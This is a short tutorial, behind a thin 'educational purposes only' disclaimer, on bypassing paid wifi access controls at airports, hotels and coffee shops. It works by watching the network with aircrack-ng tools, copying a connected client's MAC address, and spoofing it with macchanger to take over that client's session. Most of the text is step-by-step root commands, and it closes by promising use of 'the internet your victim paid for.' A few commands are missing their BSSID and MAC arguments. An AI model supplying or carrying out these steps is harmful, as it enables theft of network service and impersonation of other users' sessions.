Bypass WIFI Access Controls
*****************DISCLAIMER************************
This tutorial is designed for educational purposes only. This tutorial should not be used for unlawful access to paid internet connections. It is designed to show flaws in MAC address access contorls and filtering. It is illegal to use the methods in this tutorial to gain access to a network you do not own or have administrative acess to.
***************************************************
This tutorial covers using session stealing to bypass wifi access controls like those used at many airports, hotels, and Starbucks!
All of the below commands should be performed as root, or with sudo.
Setup
First, you must have the Aircrack-ng Suite of tools installed so we can use airmon-ng to scan for active hosts:
**IMPORTANT: Your wireless card does not have to be compatible for packet injection!!! If it will work when you type airmon-ng start then you are good to go! 99% of wireless cards will work for this!
sudo apt-get install aircrack-ng
Next, you must install macchanger, its a tool used to spoof your mac address to match an active client's:
sudo apt-get install macchanger
Session Stealing
First, find your wireless device name, usually "wlan0", and put it in monitor mode with airmon-ng:
sudo airmon-ng start wlan0
**note, your device is probably named "mon0" now, or if it is USB, the name may not have changed.
Now, scan for your target network, by typing:
sudo airodump-ng mon0
1.Look for the list of networks, find the one you are targeting, and copy the BSSID:
2. Now, you are going to filter out other networks and users by monitoring just the network you are targeting:
sudo airodump-ng --bssid mon0
3. Find an active session with a host that we can steal:
4.copy the MAC address of the client whose session we are going to steal.
5.stop monitor mode on your wireless device, if it is usb, just unplug it and plug it back in, if it is a wireless card type:
sudo airmon-ng stop mon0 **note: if your device is not "mon0" just type whatever it was after you started it.
6.Now, you are going to spoof your mac address to match the client we just copied:
1.stop the wireless device: sudo ifconfig wlan0 down **substitute wlan0 for your device name.
2.change the mac address: sudo macchanger -m wlan0
2.start the wireless device sudo ifconfig wlan0 up **substitute wlan0 for your device name
7.Use the connection manager to connect, and you have now stolen a session, and can use the internet your victim paid for!